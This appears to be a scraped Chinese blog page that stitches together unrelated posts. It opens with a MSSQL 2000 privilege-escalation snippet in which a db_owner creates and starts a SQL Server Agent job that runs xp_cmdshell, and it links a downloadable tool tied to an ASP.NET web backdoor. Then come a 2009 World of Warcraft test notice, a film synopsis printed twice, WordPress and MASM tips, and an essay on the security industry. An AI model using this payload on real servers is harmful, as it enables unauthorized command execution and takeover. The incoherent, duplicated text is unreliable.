一个针对MMSQL 2000 下的提权脚本,Dbowner提权网络上大部分都是备份到启动项后通过重启服务器达到提权的目的.但效果并不理想.其实在MMSQL 中如果开启了 SQL Server Agent 服务的话可以通过低权限下建立帐户
代码:
EXEC sp_add_job @job_name = 'jktest', @enabled = 1, @delete_level = 1 EXEC sp_add_jobstep @job_name = 'jktest', @step_name = 'ExeC my sql', @subsystem = 'TSQL', @CommAnd = 'exeC master..xp_exeCresultSet N''seleCt ''''exeC master..xp_Cmdshell "<% =Serverdos%>>C:\jk.txt"'''''',N''Master''' EXEC sp_add_jobServer @job_name = 'jktest', @Server_name = '<%=Servername%>' EXEC sp_start_job @job_name = 'jktest'
其实这个方法早就有了,不过还没有特定的Dbowner提权脚本, 我简单的写了个脚本程序,方便使用.不过这个方法我已经在ASP.NET Web BackDoor中加入了这个功能. 下载地址: http://www.ahiec.net/ewebeditor/UploadFile/dbsql.rar
原始出处:链接地址
我们很高兴地向大家确认:从7月30日星期四开始,我们将开始《魔兽世界》的内测,为即将到来的正式运营作准备。在此期间,拥有《魔兽世界》账号的现有玩家将能够登录服务器并免费进行游戏,帮助我们测试最近更新的硬件设施。我们预计内测将在一周之内完成。
参加此次内测的玩家,在开始游戏之前需要创建战网通行证并绑定《魔兽世界》账号。尚未创建战网通行证并绑定账号的玩家,请尽快访问http://www.battlenet.com.cn进行创建和绑定。在参与内测之前,您同时需要更新您的游戏客户端。在稍晚些时候,我们将提供有关客户端更新的更多情况。
借此机会我们也想向大家重申:为感谢大家在过渡期间的耐心等待和支持,我们将按照停机时间的一定比例,赠予现有每个账号一些免费游戏时间。更多信息将在今后提供。我们将在获得政府的批准后宣布游戏正式运营的时间。
我们将在下周公布有关7月30日内测的更多细节,期待与各位尽快在内测中相逢。
《魔兽世界》运营团队
2009年7月23日
剧情介绍 深夜,沉默的史密斯(克里夫·欧文)独自一人坐在偏僻危险的街头,不知正思索着什么。宁静很快被哭喊救命的尖叫打破,从转角出冲出一位美丽却惊恐万分的孕妇,她的身后紧跟着一辆飞速行驶的黑色轿车。黑色轿车在转弯时躲避不及撞上了另一辆停在街头的轿车,暂时被阻挡了去势,孕妇趁机跑向了附近的停车场躲避。然而,一名大汉很快从黑色轿车中跳出,挥舞着硕大的手枪向孕妇追去。本来打算袖手旁观的史密斯,忽然从衣服里掏出一根胡萝卜,狠狠啃了一口,也跟着追了上去。
几分钟之后,停车场已经变成了火力不断的战场,不费吹灰之力躲过呼啸子弹的史密斯却发现自己陷入了更大的麻烦:动了胎气的孕妇就快临盆!枪林弹雨中,帮着接生了一个小婴儿的史密斯,很快惊觉自己今天果然霉运连连:孕妇已经因为伤势过重一命呜呼,突然之间他成了啼哭不断的新生儿的保护人!左臂抱着小婴儿,单手持枪,史密斯杀出了一条血路。
抱着小婴儿手足无措的史密斯,不得不向妓女“DQ”当娜(莫妮卡·贝鲁奇)求助。不出意外,当娜一开始一口回绝,但经不住史密斯的恳求,勉强成了小婴儿的临时保姆。而就在这时,众多杀手接踵而来,一个接一个的陷阱不断出现,狠毒的杀手头子赫尔兹(保罗·吉亚马蒂)誓要夺回婴儿置史密斯于死地!到底这个新生的小婴儿身上有怎样不可告人的秘密?身手了得的史密斯又是何方高手? 深夜,沉默的史密斯(克里夫·欧文)独自一人坐在偏僻危险的街头,不知正思索着什么。宁静很快被哭喊救命的尖叫打破,从转角出冲出一位美丽却惊恐万分的孕妇,她的身后紧跟着一辆飞速行驶的黑色轿车。黑色轿车在转弯时躲避不及撞上了另一辆停在街头的轿车,暂时被阻挡了去势,孕妇趁机跑向了附近的停车场躲避。然而,一名大汉很快从黑色轿车中跳出,挥舞着硕大的手枪向孕妇追去。本来打算袖手旁观的史密斯,忽然从衣服里掏出一根胡萝卜,狠狠啃了一口,也跟着追了上去。
几分钟之后,停车场已经变成了火力不断的战场,不费吹灰之力躲过呼啸子弹的史密斯却发现自己陷入了更大的麻烦:动了胎气的孕妇就快临盆!枪林弹雨中,帮着接生了一个小婴儿的史密斯,很快惊觉自己今天果然霉运连连:孕妇已经因为伤势过重一命呜呼,突然之间他成了啼哭不断的新生儿的保护人!左臂抱着小婴儿,单手持枪,史密斯杀出了一条血路。
抱着小婴儿手足无措的史密斯,不得不向妓女“DQ”当娜(莫妮卡·贝鲁奇)求助。不出意外,当娜一开始一口回绝,但经不住史密斯的恳求,勉强成了小婴儿的临时保姆。而就在这时,众多杀手接踵而来,一个接一个的陷阱不断出现,狠毒的杀手头子赫尔兹(保罗·吉亚马蒂)誓要夺回婴儿置史密斯于死地!到底这个新生的小婴儿身上有怎样不可告人的秘密?身手了得的史密斯又是何方高手?
也许你早就发现了,自己wordpress博客发表文章的时候前后两篇的ID居然不连续,会很容易发现,通常前后两篇文章的ID会差个2到3的,虽然说文章ID不连续并不影响什么,但或多或少的对博客作者心情会有点影响,我刚开始就觉得很纳闷,看着就很不爽。
后来发现,原来WordPress2.6及其以后的版本添加了一个Post Revisions的功能,该功能会保存同一篇博客日志的不同版本,同样的内容多次占用数据库,因此导致了文章ID的不连续,而且浪费数据库资源。解决问题的办法就是禁止这个功能。
只要你把以下介绍的三个处理方法都用上,保证ID就可以连续了。
首先,修改wp-config.php文件,在文件中增加一行define(’WP_POST_REVISIONS’, false); 。
其次,使用“禁用WordPress自动保存的插件——Disable Revisions”,Disable Revisions可以禁止WordPress2.6以后的Post Revisions问题从而不产生多余的文章版本。
Disable Revisions下载地址:http://wordpress.org/extend/plugins/disable-revisions/
最后,对于以前已经产生的数据库中的垃圾,我们用WP Cleaner 这个插件来搞定它,WP Cleaner可以起到搜索和批量删除不再需要的wordpress文 章修订版或草稿,减小数据库的空间的作用。该插件可以在你需要使用的时候开启,使用完后禁用,如果你一开始就已经使用上面的Disable Revisions插件,则可以不用安装该插件了。如果不是的话,装上这个插件,你就会发现有很多莫名其妙的文章在你的数据库里,都可以一并删除了,当 然,安全起见,删除前建议先备份mysql数据库。
WP Cleaner下载地址:http://www.jiangmiao.org/blog/c/wpcleaner
1.设置环境变量
path中加入;d:\masm32\bin
2.编译连接命令
Ml /c /coff xx.asm
Link /subsystem:windows xx.obj yy.lib zz.res (普通PE文件)
Link /subsystem:console xx.obj yy.lib zz.res (控制台文件)
Link /subsystem:windows /dll /def:aa.def xx.obj yy.lib zz.res (DLL文件)
3.editplus中的设置
ml:
D:\masm32\bin\ml.exe
/c /coff $(FilePath)
$(FileDir)
link:
D:\masm32\bin\link.exe
/subsystem:windows $(FileNameNoExt).obj
$(FileDir)
run:
$(FileNameNoExt).exe
$(FileDir)
1. 下载并安装Ultraedit
http://www.ultraedit.com/
我安装的版本是12.20b+1官方中文版,安装路径不重要。
2.下载并安装MASM
http://www.masm32.com/
我安装的是Version 9,安装路径为:D:\masm32
3.make工具
http://211.90.241.130:22366/view.asp?file=53
压缩包中有两个make工具
nmake.exe是Microsoft (R) Program Maintenance Utility Version 1.50
make.exe是MAKE Version 4.0 Copyright (c) 1987, 1996 Borland International
这两个make工具所支持的Makefile语法和常用的选项大同小异。
把nmake.exe和make.exe解压到Masm32安装目录的bin子目录下。
4.编写一个用于设置环境变量的批处理文件var.bat
文件的内容如下:
阅读全文...
对于企业来说,到底是产品决定服务,还是服务决定产品?目前国内的安全市场比较混乱,随着安全行业逐渐被企业所重视,这很大一部分的功劳归功于黑客们,是他们让企业提高了安全意识,谁说 Hacker 都是反面的呢?对于安全厂商来说,没有黑客的攻击事件,安全厂商怎么去推他们的产品和服务呢?
从目前国内的安全市场来看,大大小小的安全公司不计其数,但大的厂家就那么几家,例如启明星辰、绿盟、安氏、天融信等等,而很多安全厂商又有多少是真正从用户的角度来考虑问题呢?目前各大安全厂商的做法都大致相同,都是由服务来推动产品。熟悉安全行业的朋友都知道,服务赚不了什么钱,而像启明这样规模的公司如果单纯靠服务来养活是完全不可能的,所以很多公司都由一个安全服务提供商转变为一个安全厂商。在安全行业刚起步时,很多公司还能遵循一定的职业守则,真正为用户所考虑,而随着竞争越来越激烈,很多公司已经渐渐转变了最初的思想。安全服务变得越来越廉价,服务只是用来推动产品的销售而已。
而近两年来,安全市场出现恶意竞争的行为。当一个客户发出安全招标书后,会邀请各大安全公司前来竞标。往往一个客户预算在 30 万的项目,有的公司竟然报到 5 万。这样会让用户感到很迷茫,这安全服务是怎么了?到底值多少钱?很多公司看中不是前期安全服务所能赚的钱,而是后期的安全建设过程中产品所带来的利润,产品所带来的利润远远比服务要多的多,这也是近年来很多公司都开始研发产品的原因。
纵观目前国内的安全市场,各种各样的产品不计其数,IDS、IPS、UTM、日志审计、桌面管理、安全网关等等,让用户都觉得这么多种类的安全产品,对企业来说就真的都需要么?
从用户的角度来看,产品只是为了方便管理,提高企业的安全性而已,而安全服务只是用来帮助企业发现自身存在的安全隐患。不管是产品还是服务,对于企业来说最终的目的只有一个那就是提高安全性,降低风险。从资金投入角度来讲,企业应根据自身的实际情况来取舍,安全服务和产品到底谁的优先级跟高。
从企业的角度来看,产品的销售可以养活一个公司,可以为公司带来更多的利润,而安全服务只是用来销售产品的一种手段。很少有公司将安全服务作为企业的重点支柱。除了像 IBM、德勤、毕马威、普华永道这样的公司会为企业做专门的安全咨询或审计。从这些公司的情况来看,他们的安全咨询足以用来养活一个公司了。
所以总结来看,目前国内做中端市场的安全公司,多以产品为主,服务为辅。做高端市场的安全咨询公司,如四大这样的,都是以作安全咨询为主。但不管是偏向于做安全产品还是做安全咨询,还是应该真正从用户的角度出发,切实的帮助用户解决问题。这样带来的才是长期的利益。
姓名:Chinadu
近期评论